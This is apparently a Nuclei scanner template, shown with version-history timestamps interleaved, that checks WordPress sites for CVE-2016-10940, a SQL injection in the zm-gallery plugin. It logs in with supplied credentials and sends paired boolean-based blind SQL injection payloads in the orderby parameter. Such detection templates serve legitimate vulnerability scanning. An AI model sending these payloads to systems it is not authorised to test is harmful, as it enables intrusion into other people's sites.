2022-02-02 15:27:47 +00:00
id : CVE-2016-10940
info :
name : The zm-gallery plugin 1.0 for WordPress SQLI
author : cckuailong
severity : high
description : The zm-gallery plugin 1.0 for WordPress has SQL injection via the order parameter.
reference :
- https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
2022-02-02 19:54:10 +00:00
- https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
2022-02-02 15:27:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-10940
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2016-10940
cwe-id : CWE-89
tags : cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-04 19:50:21 +00:00
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
2022-02-02 15:27:47 +00:00
Host : {{Hostname}}
2022-02-04 19:50:21 +00:00
- |
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
Host : {{Hostname}}
req-condition : true
2022-02-02 15:27:47 +00:00
cookie-reuse : true
matchers :
2022-02-04 19:50:21 +00:00
- type : dsl
dsl :
- 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
- '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
2022-02-04 19:54:10 +00:00
condition : and